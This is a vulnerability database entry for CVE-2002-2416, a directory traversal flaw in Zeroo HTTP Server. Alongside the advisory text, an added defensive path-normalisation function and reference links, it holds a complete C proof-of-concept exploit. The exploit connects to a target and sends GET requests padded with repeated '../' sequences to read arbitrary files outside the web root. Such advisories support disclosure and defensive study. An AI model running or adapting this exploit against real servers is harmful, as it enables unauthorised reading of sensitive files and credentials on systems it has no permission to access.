Zeroo HTTP Server Remote Directory Traversal Vulnerability

Vulnerability ID 1107107 Vulnerability type Path traversal
Published 2002-11-22 Updated 2002-12-31
CVE ID CVE-2002-2416
CNNVD-ID CNNVD-200212-188
Platform Linux CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/22063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-188
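|Vulnerability details
Zeroo HTTP Server is a simple, fast web server. It does not properly filter malicious web requests submitted by users, so a remote attacker can exploit this vulnerability to view the contents of arbitrary files on the system with the privileges of the web process. Because Zeroo does not correctly filter web requests, an attacker can submit a request containing multiple '../' sequences to the Zeroo server, bypass the web root directory restriction, and view the contents of arbitrary files on the system with the web server's privileges. This results in disclosure of sensitive information.
|Exploit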
source: http://www.securityfocus.com/bid/6308/info

It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root.

An attacker is able to traverse outside of the established web root by using dot-dot-slash (../) directory traversal sequences. An attacker may be able to obtain any web server readable files from outside of the web root directory.
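A server-side check that refuses the dot-dot-slash requests described above, shown as an added example (not Zeroo's code and not a vendor patch). The function name `normalize_request_path` is hypothetical, and the code assumes the caller has already percent-decoded the request path.

```c
#include <string.h>

/* Added example (not Zeroo code). Lexically normalise an already
 * percent-decoded request path into out, relative to the web root.
 * Returns 0 on success; -1 if the path is not absolute, contains a
 * backslash, climbs above the web root, or does not fit in out. */
int normalize_request_path(const char *req, char *out, size_t outlen)
{
    size_t len = 0;                 /* bytes stored in out so far */
    const char *p = req;

    if (outlen == 0 || req[0] != '/')
        return -1;                  /* only absolute request paths */
    out[0] = '\0';

    while (*p) {
        const char *seg;
        size_t n;

        while (*p == '/') p++;      /* collapse repeated slashes */
        seg = p;
        while (*p && *p != '/') p++;
        n = (size_t)(p - seg);

        if (n == 0 || (n == 1 && seg[0] == '.'))
            continue;               /* empty or "." segment: skip */
        if (memchr(seg, '\\', n))
            return -1;              /* refuse alternate separators */
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            if (len == 0)
                return -1;          /* ".." at the root: traversal */
            while (len > 0 && out[--len] != '/')
                ;                   /* drop the last stored segment */
            out[len] = '\0';
            continue;
        }
        if (len + 1 + n + 1 > outlen)
            return -1;              /* result would overflow out */
        out[len++] = '/';
        memcpy(out + len, seg, n);
        len += n;
        out[len] = '\0';
    }
    return 0;
}
```

The check is purely lexical, so a server should still resolve the final path (for example with `realpath()`) and confirm it lies under the web root before opening it, since a symlink inside the root can point elsewhere.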

/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 *      hehe, just a copy and paste from my other directory
 *      traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/select.h>

#define FOO "../"

void get(int sd);

int main(int argc, char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;
        int amt;
        char * host;
        char * file;
        short port;
        char expstr[1024];
        int x;
        char * baz;

        printf("UC-zeroo\n");
        printf("zeroo httpd remote exploit\n");
        printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
        if (argc != 5)
        {
                printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])\n",argv[0]);
                return 0;
        }
        host = argv[1];
        port = atoi(argv[2]);
        file = argv[3];
        amt = atoi(argv[4]);
        if ((pHe = gethostbyname(host)) == NULL)
        {
                printf("Host lookup error.\n");
                return 0;
        }
        if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("sock() failed.\n");
                return 0;
        }
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
        printf("Connecting...\n");
        if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
        {
                printf("Failed to connect to %s.\n",host);
                return 0;
        }
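        printf("Setting up exploit string..\n");
        /* each traversal unit is strlen(FOO) bytes, not one; 8 covers "GET /", "\n\n" and the NUL */
        if (amt < 0 || ((size_t)amt * strlen(FOO) + 8 + strlen(file)) > sizeof(expstr))
        {
                printf("Error. Limit 1024 characters.\n");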
                return 0;
        }
        sprintf(expstr,"GET /");
        for (x = 0; x < amt; x++)
        {
                strcat(expstr,FOO);
        }
        printf("\tInserting file string..\n");
        strcat(expstr,file);
        strcat(expstr,"\n\n");
        printf("Sending exploit string...\n");
        write(sd,expstr,strlen(expstr));
        get(sd);
        close(sd);
        return 0;
}

void get(int sd)
{
        char buf[1024];
        int x;
        fd_set rset;

        FD_ZERO(&rset);
        while (1)
        {
                FD_SET(sd,&rset);
                select(sd+1,&rset,0,0,0);
                if (FD_ISSET(sd,&rset))
                {
                        /* leave room for the terminating NUL; treat read errors as end of stream */
                        if ((x = read(sd,buf,sizeof(buf) - 1)) <= 0)
                        {
                                printf("Connection closed by foreign host.\n");
                                exit(1);
                        }
                        buf[x] = 0; /* clean out junk */
                        printf("%s\n",buf);
                }
        }
}
|References

Source: BID
Name: 6308
Link: http://www.securityfocus.com/bid/6308
Source: XF
Name: zeroo-dotdot-directory-traversal(10672)
Link: http://www.iss.net/security_center/static/10672.php
Source: BUGTRAQ
Name: 20021122ZerooFolderTraversalVulnerability
Link: http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00306.html
Source: VULNWATCH
Name: 20021121ZerooFolderTraversalVulnerability
Link: http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0083.html
Source: NSFOCUS
Name: 3974
Link: http://www.nsfocus.net/vulndb/3974